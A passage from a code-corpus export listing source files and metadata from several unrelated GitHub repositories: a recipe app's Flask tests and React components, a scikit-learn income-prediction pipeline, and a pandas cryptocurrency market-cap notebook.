#test my recipes\n def test5_myrecipe_get(self):\n tester = app.test_client(self)\n response = tester.get('/myrecipes')\n self.assertEqual(response.status_code,200)\n \n def test6_myrecipe_delete(self):\n tester = app.test_client(self)\n response = tester.delete('/myrecipes')\n self.assertEqual(response.status_code,200)\n #test shopping\n\n def test6_shopping_post_fail(self):\n tester = app.test_client(self)\n response = tester.post('/shopping',json={}, content_type='application/json',\n follow_redirects=True)\n self.assertEqual(response.status_code,400)\n \n def test6_shopping_get_fail(self):\n tester = app.test_client(self)\n response = tester.get('/shopping')\n self.assertEqual(response.status_code,404)\n \n def test7_shopping_post(self):\n tester = app.test_client(self)\n response = tester.post('/shopping',json={\"ingredients\": [\n {\n \"quantity\": \"1 lb\",\n \"name\": \" asparagus\"\n },\n {\n \"quantity\": \"1 1/2 tbsp\",\n \"name\": \"olive oil\"\n },\n {\n \"quantity\": \"1/2 tsp\",\n \"name\": \"kosher salt\"\n }\n ]}, content_type='application/json',\n follow_redirects=True)\n self.assertEqual(response.status_code,201)\n \n def test8_shopping_get(self):\n tester = app.test_client(self)\n 
response = tester.get('/shopping')\n self.assertEqual(response.status_code,200)\n response = tester.delete('/shopping')\n \n def test9_shopping_delete(self):\n tester = app.test_client(self)\n response = tester.delete('/shopping')\n self.assertEqual(response.status_code,200)\n\n # Test delete by name \n def test9_delete_name(self):\n tester = app.test_client(self)\n response = tester.post('/recipes',json={\"name\":\"hamburger\", \"time\":\"15 min\"}, content_type='application/json',\n follow_redirects=True)\n response = tester.delete('/recipes/hamburger')\n self.assertEqual(response.status_code, 200)\n\n # test delete\n def test9_delete(self):\n tester = app.test_client(self)\n response = tester.delete('/recipes')\n self.assertEqual(response.status_code, 200)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n"
},
{
"alpha_fraction": 0.6132208108901978,
"alphanum_fraction": 0.6132208108901978,
"avg_line_length": 21.935483932495117,
"blob_id": "1a8a0eb8a05f09da600bf10d511632fa17dfa5db",
"content_id": "3eb54ffe018847c9cddc184c7c4ce77cc03714d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 711,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 31,
"path": "/ui/src/RecipePage/IngredientsList.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react'\n\nconst ListBody = props => {\n const rows = props.recipeData.map((row, index) => {\n return (\n <li key={index}>{row.quantity} {row.name}</li>\n )\n })\n\n return <ul id=\"ingr_list\">{rows}</ul>\n}\n\nclass IngredientsList extends Component {\n render() {\n // Should temporarily be a fixed list on front end\n const { recipeData } = this.props // Using recipeData as variable name to pass through data from databases\n\n return (\n <ListBody recipeData = {recipeData} />\n )\n }\n}\n\nexport default IngredientsList\n\n// Put in display page\n// return (\n// <div className=\"container\">\n// <Table recipeData={recipes} />\n// </div>\n//)\n"
},
{
"alpha_fraction": 0.5751953125,
"alphanum_fraction": 0.5830078125,
"avg_line_length": 28.68115997314453,
"blob_id": "178ba6aa470164fb1469320b26f7744a321addd4",
"content_id": "f4684c03898d6ba7f66e9a10a835ff289c01d24f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2048,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 69,
"path": "/ui/src/ShoppingCart/ShoppingCart.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from \"react\";\nimport { Image } from 'react-bootstrap';\nimport './ShoppingCart.css';\nimport Table from './RecipeTable2';\nimport IngredientsList from '../RecipePage/IngredientsList'\nimport axios from \"axios\"\n\nexport default class ShoppingCart extends Component {\n \n // get my recipes list and ingredients list\n componentDidMount() {\n var recipes;\n var ingredients;\n axios.get('http://localhost:5000/myrecipes')\n .then(res => {\n recipes = res.data.recipes_list;\n // responseRecipes prevents from rendering before recipe data is loaded\n this.setState({recipes: recipes, responseRecipes: true});\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n \n axios.get('http://localhost:5000/shopping')\n .then(res => {\n ingredients = res.data.ingredients;\n // responseIngredients prevents from rendering before ingredient data is loaded\n this.setState({ingredients: ingredients, responseIngredients: true});\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n }\n \n state = {\n recipes:[],\n ingredients:[],\n responseRecipes:false,\n responseIngredients:false\n }\n \n render() {\n const {ingredients, recipes} = this.state;\n console.log(this.state);\n return (\n <div className=\"ShoppingCart\">\n <div className=\"lander\">\n <span>\n <h1 id=\"title\">Shopping Cart</h1>\n </span>\n <span>\n <div id=\"ingredients2\">\n <h3 id=\"ingr_title\">Ingredients</h3>\n <IngredientsList recipeData={ingredients}/>\n </div>\n <div id=\"saved\">\n <h3 id=\"saved_title\">Saved Recipes</h3>\n <div id=\"tablediv\">\n <Table recipeData= {recipes} />\n </div>\n </div>\n </span>\n </div>\n </div>\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5725556015968323,
"alphanum_fraction": 0.5816399455070496,
"avg_line_length": 32.19841384887695,
"blob_id": "71d737004a6c2b08c0e500a74e2e0bccb22bf920",
"content_id": "701ff058722378b5cb3396ca3afd13d36f62b20a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4183,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 126,
"path": "/ui/src/RecipePage/RecipePage.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from \"react\";\nimport { Button, Image } from 'react-bootstrap';\nimport './RecipePage.css';\nimport { FontAwesomeIcon } from '@fortawesome/react-fontawesome';\nimport { faClock } from '@fortawesome/free-solid-svg-icons';\nimport IngredientsList from './IngredientsList';\nimport InstructionsList from './InstructionsList';\nimport axios from \"axios\";\n\n\nexport default class RecipePage extends Component {\n \n // getting recipe data\n componentDidMount() {\n axios.get('http://localhost:5000/recipe')\n .then(res => {\n const recipe = res.data;\n const ingredients = recipe.ingredients;\n const name = recipe.name;\n const steps = recipe.steps;\n const time = recipe.time;\n const imageURL = recipe.imageURL;\n this.setState({ ingredients: ingredients, name: name, steps: steps, time: time, imageURL: imageURL, response: true });\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n }\n\n state = {\n ingredients: [],\n steps: [],\n name: \"\",\n time: \"\",\n imageURL: \"\",\n response:false,\n }\n\n render() {\n // prevent page from loading prematurely\n if (!this.state.response){\n return <div id=\"loadingbar\">(Loading...)</div>\n }\n const {ingredients, steps, name, time, imageURL} = this.state;\n\n return (\n <div className=\"RecipePage\">\n <div className=\"lander\">\n <span>\n <h1 id=\"title\">{name}</h1>\n <Button variant=\"btn btn-success\" id=\"shopping\" onClick={() => {sendIngredients(ingredients, this.state)}}>Add to Shopping Cart</Button>\n <Button variant=\"btn btn-success\" id=\"editBtn\" onClick={() => {sendName(name)}}>Edit Recipe</Button>\n <Button variant=\"btn btn-success\" id=\"deleteBtn\" onClick={() => {deleteRecipe(name)}}>Delete Recipe</Button>\n </span>\n <span>\n <div id=\"ingredients\">\n <h3 id=\"ingr_title\">Ingredients</h3>\n <em id=\"timeamt\">{time}</em>\n <FontAwesomeIcon icon={faClock} id=\"timeicon\"/>\n <IngredientsList recipeData={ingredients}/>\n </div>\n <div id=\"right\">\n <img src={imageURL} id=\"image\"></img>\n </div>\n </span>\n <div id=\"instructions\">\n <h3 id=\"instr_title\">Instructions</h3>\n <InstructionsList recipeData={steps}/>\n </div>\n </div>\n </div>\n );\n }\n}\n\n// shopping cart function\nfunction sendIngredients(ingredients, recipe) {\n // add to user ingredient list\n axios.post('http://localhost:5000/shopping', {\"ingredients\":ingredients})\n .then(res => {\n console.log(\"success\");\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n \n // add to user recipe list\n axios.post('http://localhost:5000/myrecipes', recipe)\n .then(res => {\n console.log(\"success\");\n window.location.href = \"http://localhost:3000/ShoppingCart\";\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n }); \n}\n\n// load recipe into cache for edit recipe\nfunction sendName(name) {\n const nameURL = encodeURIComponent(name);\n axios.get('http://localhost:5000/recipes/' + nameURL)\n .then(res => {\n console.log(\"success\");\n window.location.href = \"http://localhost:3000/EditRecipe\";\n })\n .catch(function (error) {\n //Not handling the error. 
Just logging into the console.\n console.log(error);\n });\n}\n\nfunction deleteRecipe(name) {\n const nameURL = encodeURIComponent(name);\n axios.delete('http://localhost:5000/recipes/' + nameURL)\n .then(res => {\n console.log(\"success\");\n window.location.href = \"http://localhost:3000/RecipeTable\";\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n}\n"
},
{
"alpha_fraction": 0.5584137439727783,
"alphanum_fraction": 0.5627009868621826,
"avg_line_length": 37.91666793823242,
"blob_id": "cbcd5cef294e8e3108a29789106dd096d716c3af",
"content_id": "e3f796cf09564424e97882f20149c7fcc99fa460",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 933,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 24,
"path": "/ui/src/components/Navbar.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React from 'react';\nimport { Navbar, Nav } from 'react-bootstrap';\nimport { withRouter } from 'react-router-dom';\nimport './Navbar.css';\n\nconst Navigation = (props) => {\n console.log(props);\n return (\n <Navbar bg=\"primary\" variant=\"dark\">\n <Navbar.Brand href=\"/\" id=\"brand\">Reci.P</Navbar.Brand>\n <Navbar.Toggle aria-controls=\"basic-navbar-nav\" id=\"toggle\"/>\n <Navbar.Collapse id=\"basic-navbar-nav\">\n <Nav className=\"mr-auto\">\n <Nav.Link href=\"/\" id=\"link0\">Home</Nav.Link>\n <Nav.Link href=\"/RecipeTable\" id=\"link1\">Recipe Table</Nav.Link>\n <Nav.Link href=\"/ShoppingCart\" id=\"link3\">Shopping Cart</Nav.Link>\n <Nav.Link href=\"/AddRecipe\" id=\"link4\">Add Recipe</Nav.Link>\n </Nav>\n </Navbar.Collapse>\n </Navbar>\n )\n}\n\nexport default withRouter(Navigation);"
},
{
"alpha_fraction": 0.5300092101097107,
"alphanum_fraction": 0.5493997931480408,
"avg_line_length": 24.186046600341797,
"blob_id": "28bd248f2edc32593ca4d5a07053ab4060aa2a11",
"content_id": "15b53a15247bd0ea8e8dd8d3799c72c8ca0ed39a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1083,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 43,
"path": "/ui/src/image-uploading/uploader.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react'\nimport axios from 'axios';\n\n// const client_id = \"f4ca50bc021558a\" //\"ff3a3f659d1a390\"\n\nclass App extends Component {\n state = {\n selectedFile: null,\n url: null\n }\n\n selectFileHelper = event => {\n this.setState({selectedFile: event.target.files[0]});\n this.setState({url: URL.createObjectURL(event.target.files[0])});\n }\n\n uploadHelper = () => {\n /* Post call\n const fd = new FormData();\n fd.append(\"image\", this.state.selectedFile);\n const config = {\n headers: {\n Authorization: `Client-ID ${client_id}`,\n },\n };\n axios.post('https://api.imgur.com/3/upload', fd, config)\n .then(res => \n {console.log(res);\n }); */\n }\n\n render() {\n return (\n <div className=\"App\">\n <input type = \"file\" onChange={this.selectFileHelper}/>\n <img className = \"class\" src = {this.state.url} />\n <button onClick = {this.uploadHelper}>Upload</button>\n </div>\n )\n }\n}\n\nexport default App\n"
}
],
"num_files": 16

"repo_name": "techtutor-co/Prediccion_Ingresos",
"repo_url": "https://github.com/techtutor-co/Prediccion_Ingresos",
"snapshot_id": "74a2737a595a8318ab611332eb2c5a8ae78cea53",
"revision_id": "23ef501a10a10889e4812f88b5645c822a8d8b6e",
"directory_id": "575924330a4c0a382ed0bfff1665c8b70ecc3923",
"branch_name": "refs/heads/master",
"visit_date": "2022-02-25T02:16:49.442795",
"revision_date": "2019-08-31T23:19:37",
"committer_date": "2019-08-31T23:19:37",
"github_id": null,
"star_events_count": 0,
"fork_events_count": 0,
"gha_license_id": null,
"gha_created_at": null,
"gha_updated_at": null,
"gha_pushed_at": null,
"gha_language": null,
"files":
[
{
"alpha_fraction": 0.6282051205635071,
"alphanum_fraction": 0.6304675936698914,
"avg_line_length": 33.02564239501953,
"blob_id": "10a3910ca3b94bf49f45e072876d6746154e5f95",
"content_id": "ed89d86508d06b9b8962c14759baba74fe5efab0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1326,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 39,
"path": "/train_model.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "from ml_utils.data import DataUtils\nfrom ml_utils.model import ModelUtils\nimport json\nimport sys\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score, make_scorer\nimport warnings\n\nwarnings.filterwarnings('ignore')\n \ndef main():\n if len(sys.argv) == 2:\n with open(sys.argv[1]) as json_file:\n config_data = json.load(json_file)\n data_utils = DataUtils(config_data)\n model_utils = ModelUtils(config_data)\n\n data_utils.config_dataset()\n census_df = pd.read_csv(config_data['dataset_path'])\n \n data_utils.encode_categories(census_df, data_utils.get_cols_by_type(census_df, 'object'))\n features = census_df.drop(['income'], axis = 1)\n label = census_df[['income']]\n\n X_train, X_test, y_train, y_test = data_utils.split_dataset(features, label, config_data['random_state'], config_data['test_size'])\n\n learner = LogisticRegression()\n\n learner = model_utils.train_model(learner, X_train, y_train)\n score = model_utils.eval_model(learner, accuracy_score, X_test, y_test)\n\n print(f'score: {score}')\n\n model_utils.save_model(learner, config_data['model_path'])\n\n\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.6150793433189392,
"alphanum_fraction": 0.6150793433189392,
"avg_line_length": 26.66666603088379,
"blob_id": "13f37ad59ed434e98b10b713c28807875a767bb4",
"content_id": "54609929b1767112abcf9a5f31389b01b5573fd0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 504,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 18,
"path": "/ml_utils/model.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "\nclass ModelUtils:\n\n def __init__(self, config):\n return None\n\n def train_model(self, learner, X_train, y_train):\n return learner.fit(X_train, y_train)\n\n def eval_model(self, learner, scorer, X_test, y_test):\n predictions = learner.predict(X_test)\n return scorer(y_test, predictions)\n\n\n def save_model(self, model, model_filepath):\n import pickle\n # save the classifier\n pickle.dump(model, open(model_filepath, 'wb'))\n return True\n\n "
},
{
"alpha_fraction": 0.6740614175796509,
"alphanum_fraction": 0.6740614175796509,
"avg_line_length": 33.52941131591797,
"blob_id": "cfa7f11db97dc5335641b3b7b58c02c80aa30465",
"content_id": "07389238d8a3b4efa6423c9559a08759fac12ab5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 586,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 17,
"path": "/model_pipeline/dataset_preprosesor.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "import json\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom ml_utils.data import DataUtils\n\nclass DatasetPreprocessor(BaseEstimator, TransformerMixin):\n\n def __init__(self, config_path):\n with open(config_path) as json_file:\n self._config_data = json.load(json_file)\n self._data_utils = DataUtils(self._config_data)\n\n def fit(self, X, y = None):\n return None\n\n def transform(self, X, y = None):\n categories = self._data_utils.get_cols_by_type(X, 'object')\n return self._data_utils.encode_categories(X, categories)"
},
{
"alpha_fraction": 0.6535685658454895,
"alphanum_fraction": 0.6535685658454895,
"avg_line_length": 38,
"blob_id": "bf77a77171396aa43f7f6cfffd299587d8e5c233",
"content_id": "b4a2a07e07177e79edb01df1a0e0dfa753615d20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1247,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 32,
"path": "/ml_utils/data.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "import pandas as pd \nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\n\nclass DataUtils:\n\n def __init__(self, config):\n self._origin_path = config['origin_path']\n self._target_path = config['dataset_path']\n self._column_names = config['column_names']\n\n def config_dataset(self):\n census_df = pd.read_csv(self._origin_path, names = self._column_names)\n census_df.to_csv(self._target_path, index = False)\n\n def get_cols_by_type(self, df, type_name):\n types_df = df.dtypes.to_frame(name = 'dtypes')\n categorical = types_df[types_df['dtypes'] == type_name]\n return list(categorical.index)\n \n def encode_category(self, df, category):\n lbl_encoder = LabelEncoder()\n return lbl_encoder.fit_transform(df[category])\n \n def encode_categories(self, df, categories):\n for category in categories:\n df[category] = self.encode_category(df, category)\n\n def split_dataset(self, features, label, random_state, test_size): \n X_train, X_test, y_train, y_test = train_test_split(features, label, test_size=test_size, random_state=random_state)\n\n return X_train, X_test, y_train, y_test"
},
{
"alpha_fraction": 0.6548117399215698,
"alphanum_fraction": 0.6548117399215698,
"avg_line_length": 28.9375,
"blob_id": "19d0413d4b7de07347dbc2494b265e2586a27d48",
"content_id": "8b7483677290cafded719ea2314ba33119270a28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 478,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 16,
"path": "/model_pipeline/model_builder.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "import json\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom ml_utils.model import ModelUtils\n\nclass ModelBuilder(BaseEstimator, TransformerMixin):\n\n def __init__(self, config_path):\n with open(config_path) as json_file:\n self._config_data = json.load(json_file)\n self._model_utils = ModelUtils(self._config_data)\n \n def fit(self, X, y = None):\n return None\n \n def transform(self, X, y = None):\n return None"
},
{
"alpha_fraction": 0.6911764740943909,
"alphanum_fraction": 0.6911764740943909,
"avg_line_length": 17.545454025268555,
"blob_id": "a61ddc7b3c1fb491ad292bbeda23e244f33510f0",
"content_id": "59f77b94ec8037c901dd83421c66709191be8130",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 204,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 11,
"path": "/model_pipeline/training_pipeline.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "from sklearn.pipeline import Pipeline\nfrom ml_utils.data import DataUtils\n\nclass TraininigPipeline:\n\n def __init__(self, params):\n\n return None\n\n def fit_transform(self):\n return None\n"
},
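`TraininigPipeline` and `ModelBuilder` above are still stubs (`transform` and `fit_transform` return None), so for orientation here is one way the pieces that do work could be chained with scikit-learn's `Pipeline`. This is a sketch only, not the project's implementation; it assumes the same JSON config file that train_model.py takes on the command line, and it relies on `fit()` returning `self` and `encode_categories()` returning the DataFrame, as in the corrected files above.

```python
# Illustrative composition only; not code from this repository.
import json
import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline

from ml_utils.data import DataUtils
from model_pipeline.dataset_preprosesor import DatasetPreprocessor

CONFIG_PATH = "config.json"  # assumed: the config file passed to train_model.py
with open(CONFIG_PATH) as f:
    config = json.load(f)

# Prepare the census CSV exactly as train_model.py does
data_utils = DataUtils(config)
data_utils.config_dataset()
census_df = pd.read_csv(config["dataset_path"])
features = census_df.drop(["income"], axis=1)
label = census_df["income"]

# Step 1 label-encodes the object columns; step 2 fits on the encoded frame
pipeline = Pipeline([
    ("preprocess", DatasetPreprocessor(CONFIG_PATH)),
    ("classify", LogisticRegression()),
])
pipeline.fit(features, label)
print(pipeline.score(features, label))
```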
{
"alpha_fraction": 0.6313320994377136,
"alphanum_fraction": 0.6341463327407837,
"avg_line_length": 31.33333396911621,
"blob_id": "8b39df8408cbb5ee50966a8966a9b78d4652e9c2",
"content_id": "a67c8ebddd596fc8b3c7cadee31e7ff44326f7a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1066,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 33,
"path": "/run_model.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "from ml_utils.data import DataUtils\nfrom ml_utils.model import ModelUtils\nimport json\nimport sys\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score, make_scorer\nimport warnings\nimport joblib\n\nwarnings.filterwarnings('ignore')\n\ndef main():\n if len(sys.argv) == 2:\n with open(sys.argv[1]) as json_file:\n config_data = json.load(json_file)\n data_utils = DataUtils(config_data)\n model_utils = ModelUtils(config_data)\n data_utils.config_dataset()\n census_df = pd.read_csv(config_data['dataset_path'])\n\n data_utils.encode_categories(census_df, data_utils.get_cols_by_type(census_df, 'object'))\n features = census_df.drop(['income'], axis = 1)\n label = census_df[['income']]\n\n learner = joblib.load(config_data['model_path'])\n score = model_utils.eval_model(learner, accuracy_score, features, label)\n \n print(f'score: {score}')\n\n\nif __name__ == \"__main__\":\n main()"
}
],
"num_files": 7

"repo_name": "IqraJunaid/eccbc",
"repo_url": "https://github.com/IqraJunaid/eccbc",
"snapshot_id": "8d5e8d2e634e289d69891fe1377fc0ea71b98df8",
"revision_id": "e8c25c49b223234d8c2225d2613903fdda05ca32",
"directory_id": "f01284a188185cc06ee993f66e78668a7e320c84",
"branch_name": "refs/heads/master",
"visit_date": "2020-03-29T09:25:38.405284",
"revision_date": "2018-09-27T12:30:36",
"committer_date": "2018-09-27T12:30:36",
"github_id": 149757826,
"star_events_count": 2,
"fork_events_count": 0,
"gha_license_id": null,
"gha_created_at": null,
"gha_updated_at": null,
"gha_pushed_at": null,
"gha_language": null,
"files":
[
{
"alpha_fraction": 0.8482490181922913,
"alphanum_fraction": 0.8482490181922913,
"avg_line_length": 50.400001525878906,
"blob_id": "380696c0b61d45e70123f88c9a46b335a1df6a67",
"content_id": "9c3c9e5cf850683b9577719bf81aadc56363dc7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 257,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 5,
"path": "/README.md",
"repo_name": "IqraJunaid/eccbc",
"src_encoding": "UTF-8",
"text": "To better understand the growth and impact of Bitcoin and other cryptocurrencies I will, in this project, explore the market \ncapitalization of different cryptocurrencies using:\npandas Foundations\nManipulating DataFrames with pandas\nCleaning Data in Python\n"
},
{
"alpha_fraction": 0.6912040114402771,
"alphanum_fraction": 0.7138698101043701,
"avg_line_length": 25.84357452392578,
"blob_id": "3f99c265e1f12170aecd8a05b82f726df61d537e",
"content_id": "6128a09725a05976819ceb91650a044677191265",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4809,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 179,
"path": "/crypto_notebook.py",
"repo_name": "IqraJunaid/eccbc",
"src_encoding": "UTF-8",
"text": "\n\n\n#Project By: Iqra Junaid\n\n\n# Importing pandas\nimport pandas as pd\n\n# Importing matplotlib and setting aesthetics for plotting later.\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nget_ipython().run_line_magic('config', \"InlineBackend.figure_format = 'svg'\")\nplt.style.use('fivethirtyeight')\n\n# Reading in current data from coinmarketcap.com\ncurrent = pd.read_json(\"https://api.coinmarketcap.com/v1/ticker/\")\n\n# Printing out the first few lines\ncurrent.head()\n\n\n# In[2]:\n\n\n# Reading datasets/coinmarketcap_06122017.csv into pandas\ndec6 = pd.read_json(\"https://api.coinmarketcap.com/v1/ticker/?limit=0\")\n\n# Selecting the 'id' and the 'market_cap_usd' columns\nmarket_cap_raw = dec6.loc[:, [\"id\", \"market_cap_usd\"]]\n\n# Counting the number of values\nmarket_cap_raw.count()\n\n\n# In[3]:\n\n\n# Filtering out rows without a market capitalization\ncap = market_cap_raw.query('market_cap_usd > 0')\n\n# Counting the number of values again\ncap.count()\n\n\n# In[4]:\n\n\n#Declaring these now for later use in the plots\nTOP_CAP_TITLE = 'Top 10 market capitalization'\nTOP_CAP_YLABEL = '% of total cap'\n\n# Selecting the first 10 rows and setting the index\ncap10 = cap.head(10).set_index(\"id\")\n\n# Calculating market_cap_perc\ncap10 = cap10.assign(market_cap_perc = lambda x: (x.market_cap_usd/cap.market_cap_usd.sum()) * 100)\n\n# Plotting the barplot with the title defined above \nax = cap10.market_cap_perc.head(10).plot.bar(title=TOP_CAP_TITLE)\n\n# Annotating the y axis with the label defined above\nax.set_ylabel(TOP_CAP_YLABEL)\n\n\n# In[5]:\n\n\n# Colors for the bar plot\nCOLORS = ['orange', 'green', 'blue', 'cyan', 'red', 'black', 'silver', 'yellow', 'pink', 'violet']\n\n# Plotting market_cap_usd as before but adding the colors and scaling the y-axis \nax = cap10.market_cap_usd.head(10).plot.bar(title=TOP_CAP_TITLE, colors=COLORS)\nax.set_yscale('log')\n\n# Annotating the y axis with 'USD'\nax.set_ylabel('USD')\n\n# Final touch! 
Removing the xlabel as it is not very informative\nax.set_xlabel('')\n\n\n# In[6]:\n\n\n# Selecting the id, percent_change_24h and percent_change_7d columns\nvolatility = dec6.loc[:,[\"id\", \"percent_change_24h\", \"percent_change_7d\"]]\n\n# Setting the index to 'id' and dropping all NaN rows\nvolatility = volatility.set_index('id').dropna()\n\n# Sorting the DataFrame by percent_change_24h in ascending order\nvolatility = volatility.sort_values(by='percent_change_24h', ascending=True)\n\n# Checking the first few rows\nvolatility.head()\n\n\n# In[7]:\n\n\n#Defining a function with 2 parameters, the series to plot and the title\ndef top10_subplot(volatility_series, title):\n # Making the subplot and the figure for two side by side plots\n fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(10, 6))\n \n # Plotting with pandas the barchart for the top 10 losers\n volatility_series[:10].plot.bar(ax=axes[0], color='purple')\n \n # Setting the figure's main title to the text passed as parameter\n fig.suptitle(title)\n \n # Setting the ylabel to '% change'\n ax.set_ylabel('% change')\n \n # Same as above, but for the top 10 winners\n volatility_series[-10:].plot.bar(ax=axes[1], color='pink')\n \n # Returning this for good practice, might use later\n return fig, ax\n\nDTITLE = \"24 hours top losers and winners\"\n\n# Calling the function above with the 24 hours period series and title DTITLE \nfig, ax = top10_subplot(volatility.percent_change_24h, DTITLE)\n\n\n# In[8]:\n\n\n# Sorting in ascending order\nvolatility7d = volatility.sort_values(by='percent_change_7d', ascending=True)\n\nWTITLE = \"Weekly top losers and winners\"\n\n# Calling the top10_subplot function\nfig, ax = top10_subplot(volatility7d.percent_change_7d, WTITLE)\n\n\n# In[9]:\n\n\n# Selecting everything bigger than 10 billion \nlargecaps = market_cap_raw.query('market_cap_usd > 1e+10')\n\n# Printing out largecaps\nprint(largecaps)\n\n\n# In[10]:\n\n\n# Making a nice function for counting different marketcaps from the\n# \"cap\" DataFrame. Returns an int.\n# INSTRUCTORS NOTE: Since you made it to the end, consider it a gift :D\ndef capcount(query_string):\n return cap.query(query_string).count().id\n\n# Labels for the plot\nLABELS = [\"biggish\", \"micro\", \"nano\"]\n\n# Using capcount count the biggish cryptos\nbiggish = capcount('market_cap_usd > 3e+8')\n\n# Same as above for micro ...\nmicro = capcount('market_cap_usd > 5e+7 and market_cap_usd < 3e+8')\n\n# ... and for nano\nnano = capcount('market_cap_usd < 5e+7')\n\n# Making a list with the 3 counts\nvalues = [biggish, micro, nano]\n\n# Plotting them with matplotlib \nfig, ax = plt.subplots()\nnano_plt, micro_plt, biggish_plt = plt.bar([0, 1, 2], values, tick_label=LABELS)\nnano_plt.set_facecolor('salmon')\nmicro_plt.set_facecolor('pink')\nbiggish_plt.set_facecolor('purple')\nax.set_ylabel('Number of coins')\nax.set_title('Classification of coins by market cap')\nplt.show()\n\n"
}
],
"num_files": 2

"repo_name": "vkbinfo/vishalsemari",
"repo_url": "https://github.com/vkbinfo/vishalsemari",
"snapshot_id": "7d8306ad4d6a0d1fb069c009c3e40dfd176af087",
"revision_id": "3c4a9427fd9ea4f947f1d681234de8b149cf5e2e",
"directory_id": "6a91371c3635793273fd316ff9a1c1cab024fa94",
"branch_name": "refs/heads/master",
"visit_date": "2021-01-01T06:12:55.054925",
"revision_date": "2019-03-01T21:29:00",
"committer_date": "2019-03-01T21:29:00",
"github_id": 97380623,
"star_events_count": 0,
"fork_events_count": 0,
"gha_license_id": null,
"gha_created_at": null,
"gha_updated_at": null,
"gha_pushed_at": null,
"gha_language": null,
"files":
[
{
"alpha_fraction": 0.6312763690948486,
"alphanum_fraction": 0.6354925036430359,
"avg_line_length": 27.988889694213867,
"blob_id": "b2cf53e0932a6778a46c889451be3b38636c1ace",
"content_id": "1bef4e58913d7aa462f0f668ff4d26e8d170c122",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2609,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 90,
"path": "/app.py",
"repo_name": "vkbinfo/vishalsemari",
"src_encoding": "UTF-8",
